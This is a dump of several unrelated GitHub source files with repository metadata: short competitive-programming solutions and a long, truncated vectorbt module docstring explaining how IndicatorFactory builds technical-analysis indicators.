urlpatterns += [url(r'^.*$', RedirectView.as_view(url='/index/', permanent=False), name='index')]
e2a811d5af7d9c83a519a178aba99267740a9328
0b793bce2da8c3d09b7956c0672ddbffd46feaed
/atcoder/corp/ddcc2016_qa.py
1c35c9661ac08bed450194c2318fc510b368dd9d
[ "MIT" ]
permissive
knuu/competitive-programming
c6c4e08fb231937d988bdc5a60a8ad6b31b97616
16bc68fdaedd6f96ae24310d697585ca8836ab6e
refs/heads/master
2021-01-17T09:39:02.647688
2020-11-07T03:17:22
2020-11-07T03:17:22
27,886,732
1
0
null
null
null
null
UTF-8
Python
false
false
71
py
A, B, C = map(int, input().split()) print('{:.20f}'.format(C * B / A))
8fddcccf8a50a7b00db56be3a20a3f31347fac88
82d588161a8f8cd27c3031c779120ea4380791b9
/yejin/삼성 SW 역량 테스트 기출 문제/2021 하반기/13458.py
0e77a2dfcaf4b39f4e2dc3fcea152240ebab6c5f
[]
no_license
Yejin6911/Algorithm_Study
3aa02a7d07169382a78c049d1de8251a52da816c
98c968bfeed17ab6b62e3a077280e0310f08190a
refs/heads/master
2023-09-01T00:31:07.212413
2021-10-24T07:56:21
2021-10-24T07:56:21
345,009,057
1
1
null
2021-09-20T13:08:33
2021-03-06T04:57:34
Python
UTF-8
Python
false
false
343
py
import sys import math input = sys.stdin.readline n = int(input()) A = list(map(int, input().split())) B, C = map(int, input().split()) total = n # 총감독관 감시 인원 제외 for i in range(n): if A[i] <= B: A[i] = 0 else: A[i] -= B # 부감독관 인원 계산 total += math.ceil(A[i]/C) print(total)
53d2dffde18c9980be149e87a501fe5b3b978137
e45efaf397712245b337d053a0fe2b388674e74d
/vectorbt/indicators/factory.py
86266b73a949c1c2384a25d4b5828ceb362f5c90
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
hiddenvs/vectorbt
35efc95bf7c5cc6b84917c11c988c3e07ff3ed44
44968ac579a1420f713df326eb730bae93041622
refs/heads/master
2023-03-30T15:34:53.424776
2021-03-25T21:50:33
2021-03-25T21:50:33
null
0
0
null
null
null
null
UTF-8
Python
false
false
129,901
py
"""A factory for building new indicators with ease. The indicator factory class `IndicatorFactory` offers a convenient way to create technical indicators of any complexity. By providing it with information such as calculation functions and the names of your inputs, parameters, and outputs, it will create a stand-alone indicator class capable of running the indicator for an arbitrary combination of your inputs and parameters. It also creates methods for signal generation and supports common pandas and parameter indexing operations. Each indicator is basically a pipeline that: * Accepts a list of input arrays (for example, OHLCV data) * Accepts a list of parameter arrays (for example, window size) * Accepts other relevant arguments and keyword arguments * For each parameter combination, performs calculation on the input arrays * Concatenates results into new output arrays (for example, rolling average) This pipeline can be well standardized, which is done by `run_pipeline`. `IndicatorFactory` simplifies the usage of `run_pipeline` by generating and pre-configuring a new Python class with various class methods for running the indicator. Each generated class includes the following features: * Accepts input arrays of any compatible shape thanks to broadcasting * Accepts output arrays written in-place instead of returning * Accepts arbitrary parameter grids * Supports caching and other optimizations out of the box * Supports pandas and parameter indexing * Offers helper methods for all inputs, outputs, and properties Consider the following price DataFrame composed of two columns, one per asset: ```python-repl >>> import vectorbt as vbt >>> import numpy as np >>> import pandas as pd >>> from numba import njit >>> from datetime import datetime >>> price = pd.DataFrame({ ... 'a': [1, 2, 3, 4, 5], ... 'b': [5, 4, 3, 2, 1] ... }, index=pd.Index([ ... datetime(2020, 1, 1), ... datetime(2020, 1, 2), ... datetime(2020, 1, 3), ... datetime(2020, 1, 4), ... datetime(2020, 1, 5), ... ])).astype(float) >>> price a b 2020-01-01 1.0 5.0 2020-01-02 2.0 4.0 2020-01-03 3.0 3.0 2020-01-04 4.0 2.0 2020-01-05 5.0 1.0 ``` For each column in the DataFrame, let's calculate a simple moving average and get its crossover with price. In particular, we want to test two different window sizes: 2 and 3. ## Naive approach A naive way of doing this: ```python-repl >>> ma_df = pd.DataFrame.vbt.concat( ... price.rolling(window=2).mean(), ... price.rolling(window=3).mean(), ... keys=pd.Index([2, 3], name='ma_window')) >>> ma_df ma_window 2 3 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 1.5 4.5 NaN NaN 2020-01-03 2.5 3.5 2.0 4.0 2020-01-04 3.5 2.5 3.0 3.0 2020-01-05 4.5 1.5 4.0 2.0 >>> above_signals = (price.vbt.tile(2).vbt > ma_df) >>> above_signals = above_signals.vbt.signals.first(after_false=True) >>> above_signals ma_window 2 3 a b a b 2020-01-01 False False False False 2020-01-02 True False False False 2020-01-03 False False True False 2020-01-04 False False False False 2020-01-05 False False False False >>> below_signals = (price.vbt.tile(2).vbt < ma_df) >>> below_signals = below_signals.vbt.signals.first(after_false=True) >>> below_signals ma_window 2 3 a b a b 2020-01-01 False False False False 2020-01-02 False True False False 2020-01-03 False False False True 2020-01-04 False False False False 2020-01-05 False False False False ``` Now the same using `IndicatorFactory`: ```python-repl >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window'], ... output_names=['ma'], ... ).from_apply_func(vbt.nb.rolling_mean_nb) >>> myind = MyInd.run(price, [2, 3]) >>> above_signals = myind.price_above(myind.ma, crossover=True) >>> below_signals = myind.price_below(myind.ma, crossover=True) ``` The `IndicatorFactory` class is used to construct indicator classes from UDFs. First, we provide all the necessary information (indicator conig) to build the facade of the indicator, such as the names of inputs, parameters, and outputs, and the actual calculation function. The factory then generates a self-contained indicator class capable of running arbitrary configurations of inputs and parameters. To run any configuration, we can either use the `run` method (as we did above) or the `run_combs` method. ## run and run_combs methods The main method to run an indicator is `run`, which accepts arguments based on the config provided to the `IndicatorFactory` (see the example above). These arguments include input arrays, in-place output arrays, parameters, and arguments for `run_pipeline`. The `run_combs` method takes the same inputs as the method above, but computes all combinations of passed parameters based on a combinatorial function and returns multiple instances that can be compared with each other. For example, this is useful to generate crossover signals of multiple moving averages: ```python-repl >>> myind1, myind2 = MyInd.run_combs(price, [2, 3, 4]) >>> myind1.ma myind_1_window 2 3 a b a b a b 2020-01-01 NaN NaN NaN NaN NaN NaN 2020-01-02 1.5 4.5 1.5 4.5 NaN NaN 2020-01-03 2.5 3.5 2.5 3.5 2.0 4.0 2020-01-04 3.5 2.5 3.5 2.5 3.0 3.0 2020-01-05 4.5 1.5 4.5 1.5 4.0 2.0 >>> myind2.ma myind_2_window 3 4 a b a b a b 2020-01-01 NaN NaN NaN NaN NaN NaN 2020-01-02 NaN NaN NaN NaN NaN NaN 2020-01-03 2.0 4.0 NaN NaN NaN NaN 2020-01-04 3.0 3.0 2.5 3.5 2.5 3.5 2020-01-05 4.0 2.0 3.5 2.5 3.5 2.5 >>> myind1.ma_above(myind2.ma, crossover=True) myind_1_window 2 3 myind_2_window 3 4 4 a b a b a b 2020-01-01 False False False False False False 2020-01-02 False False False False False False 2020-01-03 True False False False False False 2020-01-04 False False True False True False 2020-01-05 False False False False False False ``` Its main advantage is that it doesn't need to re-compute each combination thanks to smart caching. To get details on what arguments are accepted by any of the class methods, use `help`: ```python-repl >>> help(MyInd.run) Help on method run: run(price, window, short_name='custom', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance Run `Indicator` indicator. * Inputs: `price` * Parameters: `window` * Outputs: `ma` Pass a list of parameter names as `hide_params` to hide their column levels. Set `hide_default` to False to show the column levels of the parameters with a default value. Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`. ``` ## Parameters `IndicatorFactory` allows definition of arbitrary parameter grids. Parameters are variables that can hold one or more values. A single value can be passed as a scalar, an array, or any other object. Multiple values are passed as a list or an array (if the flag `is_array_like` is set to False for that parameter). If there are multiple parameters and each is having multiple values, their values will broadcast to a single shape: ```plaintext p1 p2 result 0 0 1 [(0, 1)] 1 [0, 1] [2] [(0, 2), (1, 2)] 2 [0, 1] [2, 3] [(0, 2), (1, 3)] ``` To illustrate the usage of parameters in indicators, let's build a basic indicator that returns 1 if the rolling mean is within upper and lower bounds, and -1 if it's outside: ```python-repl >>> @njit ... def apply_func_nb(price, window, lower, upper): ... output = np.full(price.shape, np.nan, dtype=np.float_) ... for col in range(price.shape[1]): ... for i in range(window, price.shape[0]): ... mean = np.mean(price[i - window:i, col]) ... output[i, col] = lower < mean < upper ... return output >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window', 'lower', 'upper'], ... output_names=['output'] ... ).from_apply_func(apply_func_nb) ``` By default, when `per_column` is set to False, each parameter is applied to the entire input. One parameter combination: ```python-repl >>> MyInd.run( ... price, ... window=2, ... lower=3, ... upper=5 ... ).output custom_window 2 custom_lower 3 custom_upper 5 a b 2020-01-01 NaN NaN 2020-01-02 NaN NaN 2020-01-03 0.0 1.0 2020-01-04 0.0 1.0 2020-01-05 1.0 0.0 ``` Multiple parameter combinations: ```python-repl >>> MyInd.run( ... price, ... window=[2, 3], ... lower=3, ... upper=5 ... ).output custom_window 2 3 custom_lower 3 3 custom_upper 5 5 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 NaN NaN NaN NaN 2020-01-03 0.0 1.0 NaN NaN 2020-01-04 0.0 1.0 0.0 1.0 2020-01-05 1.0 0.0 0.0 0.0 ``` Product of parameter combinations: ```python-repl >>> MyInd.run( ... price, ... window=[2, 3], ... lower=[3, 4], ... upper=5, ... param_product=True ... ).output custom_window 2 3 custom_lower 3 4 3 4 custom_upper 5 5 5 5 a b a b a b a b 2020-01-01 NaN NaN NaN NaN NaN NaN NaN NaN 2020-01-02 NaN NaN NaN NaN NaN NaN NaN NaN 2020-01-03 0.0 1.0 0.0 1.0 NaN NaN NaN NaN 2020-01-04 0.0 1.0 0.0 0.0 0.0 1.0 0.0 0.0 2020-01-05 1.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 ``` Multiple parameter combinations, one per column: ```python-repl >>> MyInd.run( ... price, ... window=[2, 3], ... lower=[3, 4], ... upper=5, ... per_column=True ... ).output custom_window 2 3 custom_lower 3 4 custom_upper 5 5 a b 2020-01-01 NaN NaN 2020-01-02 NaN NaN 2020-01-03 0.0 NaN 2020-01-04 0.0 0.0 2020-01-05 1.0 0.0 ``` Parameter defaults can be passed directly to the `IndicatorFactory.from_custom_func` and `IndicatorFactory.from_apply_func`, and overriden in the run method: ```python-repl >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window', 'lower', 'upper'], ... output_names=['output'] ... ).from_apply_func(apply_func_nb, window=2, lower=3, upper=4) >>> MyInd.run(price, upper=5).output custom_window 2 custom_lower 3 custom_upper 5 a b 2020-01-01 NaN NaN 2020-01-02 NaN NaN 2020-01-03 0.0 1.0 2020-01-04 0.0 1.0 2020-01-05 1.0 0.0 ``` Some parameters are meant to be defined per row, column, or element of the input. By default, if we pass the parameter value as an array, the indicator will treat this array as a list of multiple values - one per input. To make the indicator view this array as a single value, set the flag `is_array_like` to True in `param_settings`. Also, to automatically broadcast the passed scalar/array to the input shape, set `bc_to_input` to True, 0 (index axis), or 1 (column axis). In our example, the parameter `window` can broadcast per column, and both parameters `lower` and `upper` can broadcast per element: ```python-repl >>> @njit ... def apply_func_nb(price, window, lower, upper): ... output = np.full(price.shape, np.nan, dtype=np.float_) ... for col in range(price.shape[1]): ... for i in range(window[col], price.shape[0]): ... mean = np.mean(price[i - window[col]:i, col]) ... output[i, col] = lower[i, col] < mean < upper[i, col] ... return output >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window', 'lower', 'upper'], ... output_names=['output'] ... ).from_apply_func( ... apply_func_nb, ... param_settings=dict( ... window=dict(is_array_like=True, bc_to_input=1, per_column=True), ... lower=dict(is_array_like=True, bc_to_input=True), ... upper=dict(is_array_like=True, bc_to_input=True) ... ) ... ) >>> MyInd.run( ... price, ... window=[np.array([2, 3]), np.array([3, 4])], ... lower=np.array([1, 2]), ... upper=np.array([3, 4]), ... ).output custom_window 2 3 4 custom_lower array_0 array_0 array_1 array_1 custom_upper array_0 array_0 array_1 array_1 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 NaN NaN NaN NaN 2020-01-03 1.0 NaN NaN NaN 2020-01-04 1.0 0.0 1.0 NaN 2020-01-05 0.0 1.0 0.0 1.0 ``` Broadcasting a huge number of parameters to the input shape can consume lots of memory, especially when the array materializes. Luckily, vectorbt implements flexible broadcasting, which preserves the original dimensions of the parameter. This requires two changes: setting `keep_raw` to True in `broadcast_kwargs` and passing `flex_2d` to the apply function. There are two configs in `vectorbt.indicators.configs` exactly for this purpose: one for column-wise broadcasting and one for element-wise broadcasting: ```python-repl >>> from vectorbt.base.reshape_fns import flex_select_auto_nb >>> from vectorbt.indicators.configs import flex_col_param_config, flex_elem_param_config >>> @njit ... def apply_func_nb(price, window, lower, upper, flex_2d): ... output = np.full(price.shape, np.nan, dtype=np.float_) ... for col in range(price.shape[1]): ... _window = flex_select_auto_nb(0, col, window, flex_2d) ... for i in range(_window, price.shape[0]): ... _lower = flex_select_auto_nb(i, col, lower, flex_2d) ... _upper = flex_select_auto_nb(i, col, upper, flex_2d) ... mean = np.mean(price[i - _window:i, col]) ... output[i, col] = _lower < mean < _upper ... return output >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window', 'lower', 'upper'], ... output_names=['output'] ... ).from_apply_func( ... apply_func_nb, ... param_settings=dict( ... window=flex_col_param_config, ... lower=flex_elem_param_config, ... upper=flex_elem_param_config ... ), ... pass_flex_2d=True ... ) ``` Both bound parameters can now be passed as a scalar (value per whole input), a 1-dimensional array (value per row or column, depending upon whether input is a Series or a DataFrame), a 2-dimensional array (value per element), or a list of any of those. This allows for the highest parameter flexibility at the lowest memory cost. For example, let's build a grid of two parameter combinations, each being one window size per column and both bounds per element: ```python-repl >>> MyInd.run( ... price, ... window=[np.array([2, 3]), np.array([3, 4])], ... lower=price.values - 3, ... upper=price.values + 3, ... ).output custom_window 2 3 4 custom_lower array_0 array_0 array_1 array_1 custom_upper array_0 array_0 array_1 array_1 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 NaN NaN NaN NaN 2020-01-03 1.0 NaN NaN NaN 2020-01-04 1.0 1.0 1.0 NaN 2020-01-05 1.0 1.0 1.0 1.0 ``` Indicators can also be parameterless. See `vectorbt.indicators.basic.OBV`. ## Inputs `IndicatorFactory` supports passing none, one, or multiple inputs. If multiple inputs are passed, it tries to broadcast them into a single shape. Remember that in vectorbt each column means a separate backtest instance. That's why in order to use multiple pieces of information, such as open, high, low, close, and volume, we need to provide them as separate pandas objects rather than a single DataFrame. Let's create a parameterless indicator that measures the position of the close price within each bar: ```python-repl >>> @njit ... def apply_func_nb(high, low, close): ... return (close - low) / (high - low) >>> MyInd = vbt.IndicatorFactory( ... input_names=['high', 'low', 'close'], ... output_names=['output'] ... ).from_apply_func(apply_func_nb) >>> MyInd.run(price + 1, price - 1, price).output a b 2020-01-01 0.5 0.5 2020-01-02 0.5 0.5 2020-01-03 0.5 0.5 2020-01-04 0.5 0.5 2020-01-05 0.5 0.5 ``` To demonstrate broadcasting, let's pass high as a DataFrame, low as a Series, and close as a scalar: ```python-repl >>> df = pd.DataFrame(np.random.uniform(1, 2, size=(5, 2))) >>> sr = pd.Series(np.random.uniform(0, 1, size=5)) >>> MyInd.run(df, sr, 1).output 0 1 0 0.960680 0.666820 1 0.400646 0.528456 2 0.093467 0.134777 3 0.037210 0.102411 4 0.529012 0.652602 ``` By default, if a Series was passed, it's automatically expanded into a 2-dimensional array. To keep it as 1-dimensional, set `to_2d` to False. Similar to parameters, we can also define defaults for inputs. In addition to using scalars and arrays as default values, we can reference other inputs: ```python-repl >>> @njit ... def apply_func_nb(ts1, ts2, ts3): ... return ts1 + ts2 + ts3 >>> MyInd = vbt.IndicatorFactory( ... input_names=['ts1', 'ts2', 'ts3'], ... output_names=['output'] ... ).from_apply_func(apply_func_nb, ts2='ts1', ts3='ts1') >>> MyInd.run(price).output a b 2020-01-01 3.0 15.0 2020-01-02 6.0 12.0 2020-01-03 9.0 9.0 2020-01-04 12.0 6.0 2020-01-05 15.0 3.0 >>> MyInd.run(price, ts2=price * 2).output a b 2020-01-01 4.0 20.0 2020-01-02 8.0 16.0 2020-01-03 12.0 12.0 2020-01-04 16.0 8.0 2020-01-05 20.0 4.0 ``` What if an indicator doesn't take any input arrays? In that case, we can force the user to at least provide the input shape. Let's define a generator that emulates random returns and generates synthetic price: ```python-repl >>> @njit ... def apply_func_nb(input_shape, start, mu, sigma): ... rand_returns = np.random.normal(mu, sigma, input_shape) ... return start * vbt.nb.cumprod_nb(rand_returns + 1) >>> MyInd = vbt.IndicatorFactory( ... param_names=['start', 'mu', 'sigma'], ... output_names=['output'] ... ).from_apply_func( ... apply_func_nb, ... require_input_shape=True, ... seed=42 ... ) >>> MyInd.run(price.shape, 100, 0, 0.01).output custom_start 100 custom_mu 0 custom_sigma 0.01 0.01 0 100.496714 99.861736 1 101.147620 101.382660 2 100.910779 101.145285 3 102.504375 101.921510 4 102.023143 102.474495 ``` We can also supply pandas meta such as `input_index` and `input_columns` to the run method: ```python-repl >>> MyInd.run( ... price.shape, 100, 0, 0.01, ... input_index=price.index, input_columns=price.columns ... ).output custom_start 100 custom_mu 0 custom_sigma 0.01 0.01 a b 2020-01-01 100.496714 99.861736 2020-01-02 101.147620 101.382660 2020-01-03 100.910779 101.145285 2020-01-04 102.504375 101.921510 2020-01-05 102.023143 102.474495 ``` One can even build input-less indicator that decides on the output shape dynamically: ```python-repl >>> from vectorbt.base.combine_fns import apply_and_concat_one >>> def apply_func(i, ps, input_shape): ... out = np.full(input_shape, 0) ... out[:ps[i]] = 1 ... return out >>> def custom_func(ps): ... input_shape = (np.max(ps),) ... return apply_and_concat_one(len(ps), apply_func, ps, input_shape) >>> MyInd = vbt.IndicatorFactory( ... param_names=['p'], ... output_names=['output'] ... ).from_custom_func(custom_func) >>> MyInd.run([1, 2, 3, 4, 5]).output custom_p 1 2 3 4 5 0 1 1 1 1 1 1 0 1 1 1 1 2 0 0 1 1 1 3 0 0 0 1 1 4 0 0 0 0 1 ``` ## Outputs There are two types of outputs: regular and in-place outputs: * Regular outputs are one or more arrays returned by the function. Each should have an exact same shape and match the number of columns in the input multiplied by the number of parameter values. * In-place outputs are not returned but modified in-place. They broadcast together with inputs and are passed to the calculation function as a list, one per parameter. Two regular outputs: ```python-repl >>> @njit ... def apply_func_nb(price): ... return price - 1, price + 1 >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... output_names=['out1', 'out2'] ... ).from_apply_func(apply_func_nb) >>> myind = MyInd.run(price) >>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1) >>> pd.testing.assert_frame_equal(myind.out2, myind.price + 1) ``` One regular output and one in-place output: ```python-repl >>> @njit ... def apply_func_nb(price, in_out2): ... in_out2[:] = price + 1 ... return price - 1 >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... output_names=['out1'], ... in_output_names=['in_out2'] ... ).from_apply_func(apply_func_nb) >>> myind = MyInd.run(price) >>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1) >>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1) ``` Two in-place outputs: ```python-repl >>> @njit ... def apply_func_nb(price, in_out1, in_out2): ... in_out1[:] = price - 1 ... in_out2[:] = price + 1 >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... in_output_names=['in_out1', 'in_out2'] ... ).from_apply_func(apply_func_nb) >>> myind = MyInd.run(price) >>> pd.testing.assert_frame_equal(myind.in_out1, myind.price - 1) >>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1) ``` By default, in-place outputs are created as empty arrays with uninitialized values. This allows creation of optional outputs that, if not written, do not occupy much memory. Since not all outputs are meant to be of data type `float`, we can pass `dtype` in the `in_output_settings`. ```python-repl >>> @njit ... def apply_func_nb(price, in_out): ... in_out[:] = price > np.mean(price) >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... in_output_names=['in_out'] ... ).from_apply_func( ... apply_func_nb, ... in_output_settings=dict(in_out=dict(dtype=bool)) ... ) >>> MyInd.run(price).in_out a b 2020-01-01 False True 2020-01-02 False True 2020-01-03 False False 2020-01-04 True False 2020-01-05 True False ``` Another advantage of in-place outputs is that we can provide their initial state: ```python-repl >>> @njit ... def apply_func_nb(price, in_out1, in_out2): ... in_out1[:] = in_out1 + price ... in_out2[:] = in_out2 + price >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... in_output_names=['in_out1', 'in_out2'] ... ).from_apply_func( ... apply_func_nb, ... in_out1=100, ... in_out2='price' ... ) >>> myind = MyInd.run(price) >>> myind.in_out1 a b 2020-01-01 101 105 2020-01-02 102 104 2020-01-03 103 103 2020-01-04 104 102 2020-01-05 105 101 >>> myind.in_out2 a b 2020-01-01 2.0 10.0 2020-01-02 4.0 8.0 2020-01-03 6.0 6.0 2020-01-04 8.0 4.0 2020-01-05 10.0 2.0 ``` ## Without Numba It's also possible to supply a function that is not Numba-compiled. This is handy when working with third-party libraries (see the implementation of `IndicatorFactory.from_talib`). Additionally, we can set `keep_pd` to True to pass all inputs as pandas objects instead of raw NumPy arrays. !!! note Already broadcasted pandas meta will be provided; that is, each input array will have the same index and columns. Let's demonstrate this by wrapping a basic composed [pandas_ta](https://github.com/twopirllc/pandas-ta) strategy: ```python-repl >>> import pandas_ta as ta >>> def apply_func(open, high, low, close, volume, ema_len, linreg_len): ... df = pd.DataFrame(dict(open=open, high=high, low=low, close=close, volume=volume)) ... df.ta.strategy(ta.Strategy("MyStrategy", [ ... dict(kind='ema', length=ema_len), ... dict(kind='linreg', close='EMA_' + str(ema_len), length=linreg_len) ... ])) ... return tuple([df.iloc[:, i] for i in range(5, len(df.columns))]) >>> MyInd = vbt.IndicatorFactory( ... input_names=['open', 'high', 'low', 'close', 'volume'], ... param_names=['ema_len', 'linreg_len'], ... output_names=['ema', 'ema_linreg'] ... ).from_apply_func( ... apply_func, ... keep_pd=True, ... to_2d=False ... ) >>> my_ind = MyInd.run( ... ohlcv['Open'], ... ohlcv['High'], ... ohlcv['Low'], ... ohlcv['Close'], ... ohlcv['Volume'], ... ema_len=5, ... linreg_len=[8, 9, 10] ... ) >>> my_ind.ema_linreg custom_ema_len 5 custom_linreg_len 8 9 10 date 2021-02-02 NaN NaN NaN 2021-02-03 NaN NaN NaN 2021-02-04 NaN NaN NaN 2021-02-05 NaN NaN NaN 2021-02-06 NaN NaN NaN ... ... ... ... 2021-02-25 52309.302811 52602.005326 52899.576568 2021-02-26 50797.264793 51224.188381 51590.825690 2021-02-28 49217.904905 49589.546052 50066.206828 2021-03-01 48316.305403 48553.540713 48911.701664 2021-03-02 47984.395969 47956.885953 48150.929668 ``` In the example above, only one Series per open, high, low, close, and volume can be passed. To enable the indicator to process two-dimensional data, set `to_2d` to True and create a loop over each column in the `apply_func`. !!! hint Writing a native Numba-compiled code may provide a performance that is magnitudes higher than that offered by libraries that work on pandas. ## Raw outputs and caching `IndicatorFactory` re-uses calculation artifacts whenever possible. Since it was originally designed for hyperparameter optimization and there are times when parameter values gets repeated, prevention of processing the same parameter over and over again is inevitable for good performance. For instance, when the `run_combs` method is being used and `speedup` is set to True, it first calculates the raw outputs of all unique parameter combinations and then uses them to build outputs for the whole parameter grid. Let's first take a look at a typical raw output by setting `return_raw` to True: ```python-repl >>> raw = vbt.MA.run(price, 2, [False, True], return_raw=True) >>> raw ([array([[ nan, nan, nan, nan], [1.5 , 4.5 , 1.66666667, 4.33333333], [2.5 , 3.5 , 2.55555556, 3.44444444], [3.5 , 2.5 , 3.51851852, 2.48148148], [4.5 , 1.5 , 4.50617284, 1.49382716]])], [(2, False), (2, True)], 2, []) ``` It consists of a list of the returned output arrays, a list of the zipped parameter combinations, the number of input columns, and other objects returned along with output arrays but not listed in `output_names`. The next time we decide to run the indicator on a subset of the parameters above, we can simply pass this tuple as the `use_raw` argument. This won't call the calculation function and will throw an error if some of the requested parameter combinations cannot be found in `raw`. ```python-repl >>> vbt.MA.run(price, 2, True, use_raw=raw).ma ma_window 2 ma_ewm True a b 2020-01-01 NaN NaN 2020-01-02 1.666667 4.333333 2020-01-03 2.555556 3.444444 2020-01-04 3.518519 2.481481 2020-01-05 4.506173 1.493827 ``` Here is how the performance compares when repeatedly running the same parameter combination with and without speedup: ```python-repl >>> a = np.random.uniform(size=(1000,)) >>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=False) 73.4 ms ± 4.76 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) >>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=True) 8.99 ms ± 114 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) ``` !!! note `speedup` is disabled by default. Enable `speedup` if input arrays have few columns and there are tons of repeated parameter combinations. Disable `speedup` if input arrays are very wide, if two identical parameter combinations can lead to different results, or when requesting raw output, cache, or additional outputs outside of `output_names`. Another performance enhancement can be introduced by caching, which has to be implemented by the user. The class method `IndicatorFactory.from_apply_func` has an argument `cache_func`, which is called prior to the main calculation. Consider the following scenario: we want to compute the relative distance between two expensive rolling windows. We have already decided on the value for the first window, and want to test thousands of values for the second window. Without caching, and even with `speedup` enabled, the first rolling window will be re-calculated over and over again and waste our resources: ```python-repl >>> @njit ... def roll_mean_expensive_nb(price, w): ... for i in range(100): ... out = vbt.nb.rolling_mean_nb(price, w) ... return out >>> @njit ... def apply_func_nb(price, w1, w2): ... roll_mean1 = roll_mean_expensive_nb(price, w1) ... roll_mean2 = roll_mean_expensive_nb(price, w2) ... return (roll_mean2 - roll_mean1) / roll_mean1 >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['w1', 'w2'], ... output_names=['output'], ... ).from_apply_func(apply_func_nb) >>> MyInd.run(price, 2, 3).output custom_w1 2 custom_w2 3 a b 2020-01-01 NaN NaN 2020-01-02 NaN NaN 2020-01-03 -0.200000 0.142857 2020-01-04 -0.142857 0.200000 2020-01-05 -0.111111 0.333333 >>> %timeit MyInd.run(price, 2, np.arange(2, 1000)) 264 ms ± 3.22 ms per loop (mean ± std. dev. of 7 runs, 1 loop each) ``` To avoid this, let's cache all unique rolling windows: ```python-repl >>> @njit ... def cache_func_nb(price, ws1, ws2): ... cache_dict = dict() ... ws = ws1.copy() ... ws.extend(ws2) ... for i in range(len(ws)): ... h = hash((ws[i])) ... if h not in cache_dict: ... cache_dict[h] = roll_mean_expensive_nb(price, ws[i]) ... return cache_dict >>> @njit ... def apply_func_nb(price, w1, w2, cache_dict): ... return (cache_dict[hash(w2)] - cache_dict[hash(w1)]) / cache_dict[hash(w1)] >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['w1', 'w2'], ... output_names=['output'], ... ).from_apply_func(apply_func_nb, cache_func=cache_func_nb) >>> MyInd.run(price, 2, 3).output custom_w1 2 custom_w2 3 a b 2020-01-01 NaN NaN 2020-01-02 NaN NaN 2020-01-03 -0.200000 0.142857 2020-01-04 -0.142857 0.200000 2020-01-05 -0.111111 0.333333 >>> %timeit MyInd.run(price, 2, np.arange(2, 1000)) 145 ms ± 4.55 ms per loop (mean ± std. dev. of 7 runs, 10 loops each) ``` We have cut down the processing time almost in half. Similar to raw outputs, we can force `IndicatorFactory` to return the cache, so it can be used in other calculations or even indicators. The clear advantage of this approach is that we don't rely on some fixed set of parameter combinations anymore, but on the values of each parameter, which gives us more granularity in managing performance. ```python-repl >>> cache = MyInd.run(price, 2, np.arange(2, 1000), return_cache=True) >>> %timeit MyInd.run(price, np.arange(2, 1000), np.arange(2, 1000), use_cache=cache) 30.1 ms ± 2 ms per loop (mean ± std. dev. of 7 runs, 10 loops each) ``` ## Custom properties and methods Use `custom_output_props` argument when constructing an indicator to define lazy outputs - outputs that are processed only when explicitly called. They will become cached properties and, in contrast to regular outputs, they can have an arbitrary shape. For example, let's attach a property that will calculate the distance between the moving average and the price. ```python-repl >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... param_names=['window'], ... output_names=['ma'], ... custom_output_props=dict(distance=lambda self: (self.price - self.ma) / self.ma) ... ).from_apply_func(vbt.nb.rolling_mean_nb) >>> MyInd.run(price, [2, 3]).distance custom_window 2 3 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 0.333333 -0.111111 NaN NaN 2020-01-03 0.200000 -0.142857 0.500000 -0.250000 2020-01-04 0.142857 -0.200000 0.333333 -0.333333 2020-01-05 0.111111 -0.333333 0.250000 -0.500000 ``` Another way of defining own properties and methods is subclassing: ```python-repl >>> class MyIndExtended(MyInd): ... def plot(self, column=None, **kwargs): ... self_col = self.select_series(column=column, group_by=False) ... return self.ma.vbt.plot(**kwargs) >>> MyIndExtended.run(price, [2, 3])[(2, 'a')].plot() ``` ![](/vectorbt/docs/img/MyInd_plot.png) ## Helper properties and methods For all in `input_names`, `in_output_names`, `output_names`, and `custom_output_props`, `IndicatorFactory` will create a bunch of comparison and combination methods, such as for generating signals. What kind of methods are created can be regulated using `dtype` in the `attr_settings` dictionary. ```python-repl >>> from collections import namedtuple >>> MyEnum = namedtuple('MyEnum', ['one', 'two'])(0, 1) >>> def apply_func_nb(price): ... out_float = np.empty(price.shape, dtype=np.float_) ... out_bool = np.empty(price.shape, dtype=np.bool_) ... out_enum = np.empty(price.shape, dtype=np.int_) ... return out_float, out_bool, out_enum >>> MyInd = vbt.IndicatorFactory( ... input_names=['price'], ... output_names=['out_float', 'out_bool', 'out_enum'], ... attr_settings=dict( ... out_float=dict(dtype=np.float_), ... out_bool=dict(dtype=np.bool_), ... out_enum=dict(dtype=MyEnum) ... )).from_apply_func(apply_func_nb) >>> myind = MyInd.run(price) >>> dir(myind) [ ... 'out_bool', 'out_bool_and', 'out_bool_or', 'out_bool_xor', 'out_enum', 'out_enum_readable', 'out_float', 'out_float_above', 'out_float_below', 'out_float_equal', ... 'price', 'price_above', 'price_below', 'price_equal', ... ] 